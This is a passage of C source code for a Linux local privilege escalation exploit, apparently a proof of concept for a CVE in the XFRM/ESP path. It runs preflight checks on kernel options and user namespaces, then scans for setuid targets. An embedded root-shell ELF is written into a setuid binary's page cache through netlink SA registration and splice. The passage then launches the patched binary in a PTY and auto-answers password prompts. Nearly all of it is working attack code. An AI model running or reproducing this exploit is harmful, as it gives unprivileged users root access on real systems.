'\\0';\n\t\t\treq[i].found = 1;\n\t\t}\n\t}\n}\n\nstatic FILE *open_kconfig_gz(const char *src, int *via_popen)\n{\n\tstatic const char *cmds[] = {\n\t\t\"gzip -dc '%s' 2>/dev/null\",\n\t\t\"zcat '%s' 2>/dev/null\",\n\t\tNULL,\n\t};\n\tchar cmd[256];\n\n\tfor (int i = 0; cmds[i]; i++) {\n\t\tsnprintf(cmd, sizeof(cmd), cmds[i], src);\n\t\tFILE *f = popen(cmd, \"r\");\n\t\tif (f) {\n\t\t\t*via_popen = 1;\n\t\t\treturn f;\n\t\t}\n\t}\n\treturn NULL;\n}\n\nstatic FILE *open_kconfig_source(const char *release, char *label, size_t labellen,\n\t\t\t\t int *via_popen)\n{\n\tchar path[512];\n\tFILE *f;\n\n\t*via_popen = 0;\n\n\tsnprintf(path, sizeof(path), \"/boot/config-%s\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/build/.config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tif (access(\"/proc/config.gz\", R_OK) == 0) {\n\t\tf = open_kconfig_gz(\"/proc/config.gz\", via_popen);\n\t\tif (f) {\n\t\t\tsnprintf(label, labellen, \"/proc/config.gz\");\n\t\t\treturn f;\n\t\t}\n\t}\n\n\treturn NULL;\n}\n\nstatic void close_kconfig(FILE *f, int via_popen)\n{\n\tif (!f)\n\t\treturn;\n\tif (via_popen)\n\t\tpclose(f);\n\telse\n\t\tfclose(f);\n}\n\nstatic int check_kernel_config(void)\n{\n\tstruct utsname uts;\n\tchar cfglabel[512];\n\tint via_popen = 0;\n\n\tif (uname(&uts) < 0) {\n\t\tstatus_line(\"uname\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tphase_header(1, \"kernel config preflight\");\n\n\tFILE *cfg = open_kconfig_source(uts.release, cfglabel, sizeof(cfglabel), &via_popen);\n\tif (!cfg) {\n\t\tstatus_line(\"config file\", 0, \"not found under /boot, /lib/modules, /proc\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] WSL2: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr, \"%s  [!] or: grep -E \\\"...\\\" /boot/config-%s%s\\n\\n\",\n\t\t        C(C_YEL), uts.release, C(C_RST));\n\t\treturn -1;\n\t}\n\n\tprintf(\"  %s\u2192%s %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_BLU), cfglabel, C(C_RST));\n\tstatus_line(\"config file\", 1, via_popen ? \"via gzip/zcat\" : \"plain text\");\n\n\tstruct kconfig_req req[] = {\n\t\t{ \"CONFIG_USER_NS\",  \"y\",  \"required =y\" },\n\t\t{ \"CONFIG_XFRM\",     \"y\",  \"required =y\" },\n\t\t{ \"CONFIG_INET_ESP\", \"ym\", \"required =m or =y\" },\n\t};\n\tsize_t nreq = sizeof(req) / sizeof(req[0]);\n\tint ok_all = 1;\n\n\tscan_kconfig(cfg, req, nreq);\n\n\tfor (size_t i = 0; i < nreq; i++) {\n\t\tint ok = req[i].found && cfg_value_ok(req[i].val, req[i].expect);\n\t\tchar detail[128];\n\t\tif (req[i].found)\n\t\t\tsnprintf(detail, sizeof(detail), \"= %s  (%s)\", req[i].val, req[i].hint);\n\t\telse\n\t\t\tsnprintf(detail, sizeof(detail), \"missing (%s)\", req[i].hint);\n\t\tstatus_line(req[i].key, ok, detail);\n\t\tif (!ok)\n\t\t\tok_all = 0;\n\t}\n\n\tclose_kconfig(cfg, via_popen);\n\n\tprintf(\"\\n\");\n\tif (!ok_all) {\n\t\tfprintf(stderr, \"%s  [!] kernel does not meet exploit requirements.%s\\n\", C(C_RED), C(C_RST));\n\t\tfprintf(stderr, \"%s  [!] manual check: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\\n\",\n\t\t        C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"%s  kernel options OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic void print_sysctl_val(const char *path, const char *name)\n{\n\tFILE *f = fopen(path, \"r\");\n\tif (!f)\n\t\treturn;\n\tchar val[64];\n\tif (!fgets(val, sizeof(val), f)) {\n\t\tfclose(f);\n\t\treturn;\n\t}\n\tval[strcspn(val, \"\\n\\r\")] = '\\0';\n\tprintf(\"      %s%s%s = %s\\n\", C(C_DIM), name, C(C_RST), val);\n\tfclose(f);\n}\n\nstatic int check_userns_runtime(void)\n{\n\tphase_header(2, \"user namespace runtime check\");\n\tprintf(\"  %s\u2192%s unshare(CLONE_NEWUSER | CLONE_NEWNET)%s\\n\\n\",\n\t       C(C_DIM), C(C_RST), C(C_DIM));\n\n\tif (getuid() == 0) {\n\t\tstatus_line(\"privilege\", 0, \"running as root \u2014 use an unprivileged user for LPE\");\n\t\tfprintf(stderr, \"\\n%s  [!] Exploit is meant to run as a normal user (uid != 0).%s\\n\\n\",\n\t\t        C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tpid_t pid = fork();\n\tif (pid < 0) {\n\t\tstatus_line(\"fork\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0)\n\t\t\t_exit(1);\n\t\t_exit(0);\n\t}\n\n\tint st;\n\tif (waitpid(pid, &st, 0) < 0) {\n\t\tstatus_line(\"waitpid\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint ok = WIFEXITED(st) && WEXITSTATUS(st) == 0;\n\tif (!ok) {\n\t\tstatus_line(\"unshare\", 0, \"Operation not permitted\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] CONFIG_USER_NS=y in /boot/config does not guarantee unprivileged userns at runtime.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] This host blocks user namespaces (common on hardened Ubuntu 22.04+ / enterprise VMs).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] Changing the setuid target (su/sudo/pkexec) will not help \u2014 unshare must succeed first.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tprintf(\"\\n  %sRelevant sysctls on this host:%s\\n\", C(C_DIM), C(C_RST));\n\t\tprint_sysctl_val(\"/proc/sys/kernel/apparmor_restrict_unprivileged_userns\",\n\t\t\t\t \"kernel.apparmor_restrict_unprivileged_userns\");\n\t\tprint_sysctl_val(\"/proc/sys/kernel/unprivileged_userns_clone\",\n\t\t\t\t \"kernel.unprivileged_userns_clone\");\n\t\tprint_sysctl_val(\"/proc/sys/user/max_user_namespaces\",\n\t\t\t\t \"user.max_user_namespaces\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] Lab only (as root): sysctl -w kernel.apparmor_restrict_unprivileged_userns=0%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] Without userns: this PoC cannot run (see CVE-2026-43500 rxrpc variant).%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tstatus_line(\"unshare\", 1, \"user+net namespace available\");\n\tprintf(\"%s  runtime userns check OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic int skip_tree(const char *path)\n{\n\treturn strcmp(path, \"/proc\") == 0 ||\n\t       strcmp(path, \"/sys\") == 0 ||\n\t       strcmp(path, \"/dev\") == 0 ||\n\t       strcmp(path, \"/run\") == 0;\n}\n\nstatic int target_is_exploitable(const char *path)\n{\n\tstruct stat st;\n\n\tif (stat(path, &st) < 0 || !S_ISREG(st.st_mode))\n\t\treturn 0;\n\tif (!(st.st_mode & S_ISUID))\n\t\treturn 0;\n\tif (access(path, R_OK | X_OK) != 0)\n\t\treturn 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn 0;\n\tclose(fd);\n\treturn 1;\n}\n\nstatic int probe_target(const char *path, char *why, size_t whylen)\n{\n\tstruct stat st;\n\n\tif (stat(path, &st) < 0) {\n\t\tsnprintf(why, whylen, \"missing (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!S_ISREG(st.st_mode)) {\n\t\tsnprintf(why, whylen, \"not a regular file\");\n\t\treturn -1;\n\t}\n\tif (!(st.st_mode & S_ISUID)) {\n\t\tsnprintf(why, whylen, \"no setuid bit (mode %04o)\", st.st_mode & 07777);\n\t\treturn -1;\n\t}\n\tif (access(path, R_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not readable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (access(path, X_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not executable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0) {\n\t\tsnprintf(why, whylen, \"open(O_RDONLY) denied (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tclose(fd);\n\twhy[0] = '\\0';\n\treturn 0;\n}\n\nstatic int setuid_walk(const char *path, const struct stat *st, int flag,\n\t\t       struct FTW *ftw)\n{\n\t(void)ftw;\n\tif (flag == FTW_D && skip_tree(path))\n\t\treturn FTW_SKIP_SUBTREE;\n\n\tif (flag != FTW_F)\n\t\treturn 0;\n\n\tif (!S_ISREG(st->st_mode))\n\t\treturn 0;\n\tif (!(st->st_mode & S_ISUID))\n\t\treturn 0;\n\n\tg_setuid_count++;\n\tint exploitable = target_is_exploitable(path);\n\tif (exploitable)\n\t\tg_exploitable_count++;\n\n\tint is_target = (strcmp(path, g_target) == 0);\n\tconst char *color = exploitable ? C(C_GRN) : C(C_YEL);\n\tconst char *badge = exploitable ? \"[+]\" : \"[~]\";\n\n\tprintf(\"  %s%02d%s %s%s%s %s%s%s%s\\n\",\n\t       C(C_DIM), g_setuid_count, C(C_RST),\n\t       color, badge, C(C_RST), path,\n\t       is_target ? \"  \u2190 target\" : \"\",\n\t       exploitable ? \"\" : \"  (visible, not usable)\",\n\t       C(C_RST));\n\treturn 0;\n}\n\nstatic int scan_setuid_binaries(void)\n{\n\tphase_header(3, \"setuid binary scan\");\n\tprintf(\"  %s\u2192%s find / -perm -4000 -type f 2>/dev/null%s\\n\\n\",\n\t       C(C_DIM), C(C_RST), C(C_DIM));\n\n\tg_setuid_count = 0;\n\tg_exploitable_count = 0;\n\tint rc = nftw(\"/\", setuid_walk, 32, FTW_PHYS | FTW_MOUNT);\n\n\tprintf(\"\\n\");\n\tif (rc != 0 && rc != EACCES) {\n\t\tstatus_line(\"nftw\", 0, strerror(rc > 0 ? rc : errno));\n\t}\n\tif (g_setuid_count == 0) {\n\t\tstatus_line(\"setuid\", 0, \"no SUID binaries found\");\n\t\treturn -1;\n\t}\n\tprintf(\"%s  found %d setuid binaries, %d exploitable (readable + openable).%s\\n\",\n\t       g_exploitable_count ? C(C_GRN) : C(C_YEL),\n\t       g_setuid_count, g_exploitable_count, C(C_RST));\n\tif (g_exploitable_count == 0) {\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] SUID files are visible but not readable \u2014 typical on shared hosting (CageFS/cPanel).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] This exploit must open the target for read (splice). No usable target on this account.%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"\\n\");\n\treturn 0;\n}\n\n// minimal x86_64 root-shell ELF, entry=0x400078\n// setgid(0); setuid(0); execve(\"/bin/sh\", NULL, [\"TERM=xterm\",NULL]) \nstatic const unsigned char shell_elf[PAYLOAD_LEN] = {\n\t0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,\n\t0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,\n\t0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,\n\t0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,\n\t0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n};\n\nstatic int save_original(const char *path)\n{\n\tif (g_have_backup) return 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0) return -1;\n\tint n = read(fd, g_backup, PAYLOAD_LEN);\n\tclose(fd);\n\tif (n != PAYLOAD_LEN) return -1;\n\tg_have_backup = 1;\n\treturn 0;\n}\n\nstatic int setup_userns_netns(void)\n{\n\tuid_t ruid = getuid();\n\tgid_t rgid = getgid();\n\n\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {\n\t\tfprintf(stderr, \"unshare: %s\\n\", strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint fd = open(\"/proc/self/setgroups\", O_WRONLY);\n\tif (fd >= 0) { write(fd, \"deny\\n\", 5); close(fd); }\n\n\tchar buf[128];\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", ruid);\n\tfd = open(\"/proc/self/uid_map\", O_WRONLY);\n\tif (fd < 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", rgid);\n\tfd = open(\"/proc/self/gid_map\", O_WRONLY);\n\tif (fd < 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tint s = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (s >= 0) {\n\t\tstruct ifreq ifr;\n\t\tmemset(&ifr, 0, sizeof(ifr));\n\t\tstrncpy(ifr.ifr_name, \"lo\", IFNAMSIZ - 1);\n\t\tif (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) {\n\t\t\tifr.ifr_flags |= IFF_UP | IFF_RUNNING;\n\t\t\tioctl(s, SIOCSIFFLAGS, &ifr);\n\t\t}\n\t\tclose(s);\n\t}\n\treturn 0;\n}\n\nstatic void nl_put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)\n{\n\tstruct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));\n\trta->rta_type = type;\n\trta->rta_len  = RTA_LENGTH(len);\n\tmemcpy(RTA_DATA(rta), data, len);\n\tnlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);\n}\n\nstatic int add_xfrm_sa(uint32_t spi, uint32_t patch_val)\n{\n\tint sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);\n\tif (sk < 0) return -1;\n\n\tstruct sockaddr_nl nl = { .nl_family = AF_NETLINK };\n\tif (bind(sk, (struct sockaddr *)&nl, sizeof(nl)) < 0) { close(sk); return -1; }\n\n\tchar buf[4096];\n\tmemset(buf, 0, sizeof(buf));\n\tstruct nlmsghdr *nlh = (struct nlmsghdr *)buf;\n\tnlh->nlmsg_type  = XFRM_MSG_NEWSA;\n\tnlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;\n\tnlh->nlmsg_pid   = getpid();\n\tnlh->nlmsg_seq   = 1;\n\tnlh->nlmsg_len   = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));\n\n\tstruct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);\n\txs->id.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs->id.spi      = htonl(spi);\n\txs->id.proto    = IPPROTO_ESP;\n\txs->saddr.a4    = inet_addr(\"127.0.0.1\");\n\txs->family      = AF_INET;\n\txs->mode          = XFRM_MODE_TRANSPORT;\n\txs->replay_window = 0;\n\txs->reqid         = 0x1234;\n\txs->flags         = XFRM_STATE_ESN;\n\txs->lft.soft_byte_limit   = (uint64_t)-1;\n\txs->lft.hard_byte_limit   = (uint64_t)-1;\n\txs->lft.soft_packet_limit = (uint64_t)-1;\n\txs->lft.hard_packet_limit = (uint64_t)-1;\n\txs->sel.family  = AF_INET;\n\txs->sel.prefixlen_d = 32;\n\txs->sel.prefixlen_s = 32;\n\txs->sel.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs->sel.saddr.a4 = inet_addr(\"127.0.0.1\");\n\n\tchar auth_buf[sizeof(struct xfrm_algo_auth) + 32];\n\tmemset(auth_buf, 0, sizeof(auth_buf));\n\tstruct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)auth_buf;\n\tstrncpy(aa->alg_name, \"hmac(sha256)\", sizeof(aa->alg_name) - 1);\n\taa->alg_key_len   = 32 * 8;\n\taa->alg_trunc_len = 128;\n\tmemset(aa->alg_key, 0xAA, 32);\n\tnl_put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, auth_buf, sizeof(auth_buf));\n\n\tchar ciph_buf[sizeof(struct xfrm_algo) + 16];\n\tmemset(ciph_buf, 0, sizeof(ciph_buf));\n\tstruct xfrm_algo *ea = (struct xfrm_algo *)ciph_buf;\n\tstrncpy(ea->alg_name, \"cbc(aes)\", sizeof(ea->alg_name) - 1);\n\tea->alg_key_len = 16 * 8;\n\tmemset(ea->alg_key, 0xBB, 16);\n\tnl_put_attr(nlh, XFRMA_ALG_CRYPT, ciph_buf, sizeof(ciph_buf));\n\n\tstruct xfrm_encap_tmpl enc;\n\tmemset(&enc, 0, sizeof(enc));\n\tenc.encap_type  = UDP_ENCAP_ESPINUDP;\n\tenc.encap_sport = htons(ENC_PORT);\n\tenc.encap_dport = htons(ENC_PORT);\n\tnl_put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));\n\n\tstruct xfrm_replay_state_esn esn;\n\tmemset(&esn, 0, sizeof(esn));\n\tesn.bmp_len       = 1;\n\tesn.oseq          = 0;\n\tesn.seq           = REPLAY_SEQ;\n\tesn.oseq_hi       = 0;\n\tesn.seq_hi        = patch_val;\n\tesn.replay_window = 32;\n\tnl_put_attr(nlh, XFRMA_REPLAY_ESN_VAL, &esn, sizeof(esn) + 4);\n\n\tif (send(sk, nlh, nlh->nlmsg_len, 0) < 0) { close(sk); return -1; }\n\n\tchar rbuf[4096];\n\tint n = recv(sk, rbuf, sizeof(rbuf), 0);\n\tclose(sk);\n\tif (n < 0) return -1;\n\n\tstruct nlmsghdr *rh = (struct nlmsghdr *)rbuf;\n\tif (rh->nlmsg_type == NLMSG_ERROR) {\n\t\tstruct nlmsgerr *e = NLMSG_DATA(rh);\n\t\tif (e->error) return -1;\n\t}\n\treturn 0;\n}\n\nstatic int do_one_write(const char *path, off_t offset, uint32_t spi)\n{\n\tint sk_recv = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_recv < 0) return -1;\n\n\tint one = 1;\n\tsetsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));\n\n\tstruct sockaddr_in sa;\n\tmemset(&sa, 0, sizeof(sa));\n\tsa.sin_family = AF_INET;\n\tsa.sin_port   = htons(ENC_PORT);\n\tsa.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\n\tif (bind(sk_recv, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(sk_recv); return -1; }\n\n\tint encap = UDP_ENCAP_ESPINUDP;\n\tif (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { close(sk_recv); return -1; }\n\n\tint sk_send = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_send < 0) { close(sk_recv); return -1; }\n\tif (connect(sk_send, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint file_fd = open(path, O_RDONLY);\n\tif (file_fd < 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint pfd[2];\n\tif (pipe(pfd) < 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; }\n\n\tunsigned char hdr[24];\n\t*(uint32_t *)(hdr + 0) = htonl(spi);\n\t*(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);\n\tmemset(hdr + 8, 0xCC, 16);\n\n\tstruct iovec iov = { .iov_base = hdr, .iov_len = sizeof(hdr) };\n\tif (vmsplice(pfd[1], &iov, 1, 0) != (ssize_t)sizeof(hdr))\n\t\tgoto fail;\n\n\toff_t off = offset;\n\tif (splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE) != 16)\n\t\tgoto fail;\n\n\tssize_t s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);\n\tusleep(150 * 1000);\n\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn (s == 40) ? 0 : -1;\n\nfail:\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn -1;\n}\n\n/* corrupt stage error codes (child maps to exit 11..13) */\n#define CORRUPT_ERR_UNSHARE 1\n#define CORRUPT_ERR_XFRM    2\n#define CORRUPT_ERR_WRITE   3\n\nstatic int corrupt_su(void)\n{\n\tif (setup_userns_netns() < 0)\n\t\treturn CORRUPT_ERR_UNSHARE;\n\tusleep(100 * 1000);\n\n\tfor (int i = 0; i < TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\tuint32_t val =\n\t\t\t((uint32_t)shell_elf[i * 4 + 0] << 24) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 1] << 16) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 2] <<  8) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 3]);\n\t\tif (add_xfrm_sa(spi, val) < 0)\n\t\t\treturn CORRUPT_ERR_XFRM;\n\t}\n\n\tfor (int i = 0; i < TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\toff_t off = PATCH_OFFSET + (off_t)i * 4;\n\t\tif (do_one_write(g_target, off, spi) < 0)\n\t\t\treturn CORRUPT_ERR_WRITE;\n\t}\n\treturn 0;\n}\n\nstatic const char *corrupt_err_msg(int code)\n{\n\tswitch (code) {\n\tcase CORRUPT_ERR_UNSHARE: return \"unshare / uid_map / lo setup failed in child\";\n\tcase CORRUPT_ERR_XFRM:    return \"XFRM SA registration failed (netlink denied?)\";\n\tcase CORRUPT_ERR_WRITE:   return \"splice/UDP 4500 write failed\";\n\tdefault:                  return \"unknown corrupt error\";\n\t}\n}\n\nstatic int target_already_patched(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn 0;\n\tuint8_t got[8];\n\tssize_t n = pread(fd, got, sizeof(got), ENTRY_OFFSET);\n\tclose(fd);\n\tif (n != (ssize_t)sizeof(got))\n\t\treturn 0;\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0;\n}\n\nstatic int verify_patch(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn -1;\n\tuint8_t got[8];\n\tif (pread(fd, got, sizeof(got), ENTRY_OFFSET) != (ssize_t)sizeof(got)) {\n\t\tclose(fd);\n\t\treturn -1;\n\t}\n\tclose(fd);\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0 ? 0 : -1;\n}\n\nstatic int run_esp_corrupt_stage(char *detail, size_t dlen)\n{\n\tpid_t cpid = fork();\n\tif (cpid < 0) {\n\t\tsnprintf(detail, dlen, \"fork: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (cpid == 0) {\n\t\tint rc = corrupt_su();\n\t\t_exit(rc == 0 ? 0 : 10 + rc);\n\t}\n\tint wstatus;\n\tif (waitpid(cpid, &wstatus, 0) < 0) {\n\t\tsnprintf(detail, dlen, \"waitpid: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!WIFEXITED(wstatus)) {\n\t\tsnprintf(detail, dlen, \"child killed by signal %d\", WTERMSIG(wstatus));\n\t\treturn -1;\n\t}\n\tint est = WEXITSTATUS(wstatus);\n\tif (est != 0) {\n\t\tsnprintf(detail, dlen, \"%s\", corrupt_err_msg(est - 10));\n\t\treturn -1;\n\t}\n\tif (verify_patch(g_target) < 0) {\n\t\tsnprintf(detail, dlen,\n\t\t\t \"page cache unchanged at 0x%x (patched kernel / LSM / container?)\",\n\t\t\t ENTRY_OFFSET);\n\t\treturn -1;\n\t}\n\tdetail[0] = '\\0';\n\treturn 0;\n}\n\nstatic int target_is_su_binary(const char *path)\n{\n\tconst char *base = strrchr(path, '/');\n\tbase = base ? base + 1 : path;\n\treturn strcmp(base, \"su\") == 0;\n}\n\nstatic void exec_patched_target(void)\n{\n\tchar *envp[] = { \"TERM=xterm\", NULL };\n\texecle(g_target, g_target, NULL, envp);\n\t_exit(127);\n}\n\nstatic void exec_su_login(void)\n{\n\tstatic const char *paths[] = {\n\t\t\"/bin/su\", \"/usr/bin/su\", \"/sbin/su\", \"/usr/sbin/su\", NULL,\n\t};\n\tfor (int i = 0; paths[i]; i++)\n\t\texecl(paths[i], \"su\", \"-\", (char *)NULL);\n\texeclp(\"su\", \"su\", \"-\", (char *)NULL);\n\t_exit(127);\n}\n\nstatic int run_root_pty(void)\n{\n\tint master = posix_openpt(O_RDWR | O_NOCTTY);\n\tif (master < 0)\n\t\treturn -1;\n\tif (grantpt(master) < 0 || unlockpt(master) < 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tchar *slave_name = ptsname(master);\n\tif (!slave_name) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\n\tstruct winsize ws;\n\tif (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0)\n\t\tioctl(master, TIOCSWINSZ, &ws);\n\n\tpid_t pid = fork();\n\tif (pid < 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tsetsid();\n\t\tint slave = open(slave_name, O_RDWR);\n\t\tif (slave < 0)\n\t\t\t_exit(127);\n\t\tioctl(slave, TIOCSCTTY, 0);\n\t\tdup2(slave, 0);\n\t\tdup2(slave, 1);\n\t\tdup2(slave, 2);\n\t\tif (slave > 2)\n\t\t\tclose(slave);\n\t\tclose(master);\n\t\tif (target_is_su_binary(g_target))\n\t\t\texec_su_login();\n\t\texec_patched_target();\n\t}\n\n\tsignal(SIGTTOU, SIG_IGN);\n\tsignal(SIGTTIN, SIG_IGN);\n\tsignal(SIGPIPE, SIG_IGN);\n\tsignal(SIGHUP, SIG_IGN);\n\n\tstruct termios saved_termios;\n\tint restore_termios = 0;\n\tif (tcgetattr(STDIN_FILENO, &saved_termios) == 0) {\n\t\tstruct termios raw = saved_termios;\n\t\tcfmakeraw(&raw);\n\t\tif (tcsetattr(STDIN_FILENO, TCSANOW, &raw) == 0)\n\t\t\trestore_termios = 1;\n\t}\n\n\tint auto_pw_sent = 0;\n\tint stdin_eof = 0;\n\tint saw_master_output = 0;\n\tint total_ms = 0;\n\tchar buf[4096];\n\n\tfor (;;) {\n\t\tstruct pollfd pfds[2] = {\n\t\t\t{ stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },\n\t\t\t{ master, POLLIN, 0 },\n\t\t};\n\t\tint pr = poll(pfds, 2, 200);\n\t\tif (pr < 0 && errno != EINTR)\n\t\t\tbreak;\n\t\ttotal_ms += 200;\n\n\t\tif (pfds[1].revents & POLLIN) {\n\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\tif (n <= 0)\n\t\t\t\tbreak;\n\t\t\tsaw_master_output = 1;\n\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\tif (!auto_pw_sent && n < (ssize_t)sizeof(buf)) {\n\t\t\t\tbuf[n] = '\\0';\n\t\t\t\tif (strstr(buf, \"Password\") || strstr(buf, \"password\")) {\n\t\t\t\t\twrite(master, \"\\n\", 1);\n\t\t\t\t\tauto_pw_sent = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (!stdin_eof && (pfds[0].revents & POLLIN)) {\n\t\t\tssize_t n = 